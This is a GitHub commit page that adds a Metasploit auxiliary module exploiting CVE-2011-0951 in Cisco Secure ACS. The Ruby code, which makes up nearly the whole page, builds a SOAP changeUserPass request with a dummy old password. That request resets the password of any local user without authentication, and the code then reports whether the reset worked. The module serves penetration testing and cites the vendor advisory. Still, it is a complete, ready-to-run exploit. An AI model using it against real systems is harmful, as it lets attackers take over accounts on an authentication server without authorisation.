Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
pyoor
committed
May 13, 2012
1 parent
79a590c
commit 6b6dc60
Showing
1 changed file
with
117 additions
and
0 deletions.
There are no files selected for viewing
117 changes: 117 additions & 0 deletions
117
modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,117 @@ | ||
## | ||
# $Id$ | ||
## | ||
|
||
## | ||
# This file is part of the Metasploit Framework and may be subject to | ||
# redistribution and commercial restrictions. Please see the Metasploit | ||
# web site for more information on licensing and terms of use. | ||
# http://metasploit.com/ | ||
## | ||
|
||
require 'msf/core' | ||
|
||
class Metasploit4 < Msf::Auxiliary | ||
|
||
include Msf::Exploit::Remote::HttpClient | ||
include Msf::Auxiliary::Report | ||
include Msf::Auxiliary::Scanner | ||
|
||
def initialize | ||
super( | ||
'Name' => 'Cisco Secure ACS Unauthorized Password Change', | ||
'Version' => '$Revision$', | ||
'Description' => %q{ | ||
This module exploits an authentication bypass issue which allows arbitrary password | ||
change requests to be issued for any user in the local store. | ||
}, | ||
'References' => | ||
[ | ||
['BID', '47093'], | ||
['CVE', 'CVE-2011-0951'], | ||
['URL', 'http://www.cisco.com/en/US/products/csa/cisco-sa-20110330-acs.html'], | ||
], | ||
'Author' => | ||
[ | ||
'Jason Kratzer', | ||
'www.flinkd.org' | ||
], | ||
'License' => MSF_LICENSE | ||
) | ||
|
||
register_options( | ||
[ | ||
Opt::RPORT(443), | ||
OptString.new('URI', [false, 'Path to UCP WebService', '/PI/services/UCP/']), | ||
OptString.new('USERNAME', [true, 'Username to use', '']), | ||
OptString.new('PASSWORD', [true, 'Password to use', '']), | ||
OptBool.new('SSL', [true, 'Use SSL', true],), | ||
], self.class) | ||
end | ||
|
||
def rport | ||
datastore['RPORT'] | ||
end | ||
|
||
def run_host(ip) | ||
soapenv='http://schemas.xmlsoap.org/soap/envelope/' | ||
soapenvenc='http://schemas.xmlsoap.org/soap/encoding/' | ||
xsi='http://www.w3.org/1999/XMLSchema-instance' | ||
xsd='http://www.w3.org/1999/XMLSchema' | ||
ns1='ns1:changeUserPass' | ||
|
||
data = '<?xml version="1.0" encoding="utf-8"?>' + "\r\n" | ||
data << '<SOAP-ENV:Envelope SOAP-ENV:encodingStyle="' + soapenvenc + '" ' | ||
data << 'xmlns:SOAP-ENC="' + soapenvenc + '" ' | ||
data << 'xmlns:xsi="' + xsi + '" xmlns:SOAP-ENV="' + soapenv + '" ' | ||
data << 'xmlns:xsd="' + xsd + '">' + "\r\n" | ||
|
||
data << '<SOAP-ENV:Body>' + "\r\n" | ||
data << '<ns1:changeUserPass xmlns:ns1="UCP" SOAP-ENC:root="1">' + "\r\n" | ||
data << '<v1 xsi:type="xsd:string">' + datastore['USERNAME'] + '</v1>' + "\r\n" | ||
data << '<v2 xsi:type="xsd:string">fakepassword</v2>' + "\r\n" | ||
data << '<v3 xsi:type="xsd:string">' + datastore['PASSWORD'] + '</v3>' + "\r\n" | ||
data << '</ns1:changeUserPass>' | ||
data << '</SOAP-ENV:Body>' + "\r\n" | ||
data << '</SOAP-ENV:Envelope>' + "\r\n\r\n" | ||
|
||
print_status("Issuing password change request for: " + datastore['USERNAME']) | ||
|
||
begin | ||
res = send_request_raw({ | ||
'uri' => "/#{datastore['URI']}", | ||
'method' => 'POST', | ||
'data' => data, | ||
'headers' => | ||
{ | ||
'Content-Length' => data.length, | ||
'SOAPAction' => '"changeUserPass"', | ||
'Content-Type' => 'text/xml; charset=UTF-8', | ||
} | ||
}, 60) | ||
|
||
rescue ::Rex::ConnectionError | ||
print_error("#{rhost}:#{rport} [ACS] Unable to communicate") | ||
return :abort | ||
end | ||
|
||
if not res | ||
print_error("#{rhost}:#{rport} [ACS] Unable to connect") | ||
return | ||
elsif res.code == 200 | ||
body = res.body | ||
if body.match(/success/i) | ||
print_good("#{rhost} - Success! Password has been changed.") | ||
elsif body.match(/Password has already been used/) | ||
print_error("#{rhost} - Failed! The supplied password has already been used.") | ||
print_error("Please change the password and try again.") | ||
elsif body.match(/Invalid credntials for user/) | ||
print_error("#{rhost} - Failed! Either the username does not exist or target is not vulnerable.") | ||
print_error("Please change the username and try again.") | ||
else | ||
print_error("#{rhost} - Failed! An unexpected error has occurred.") | ||
end | ||
end | ||
|
||
end | ||
end |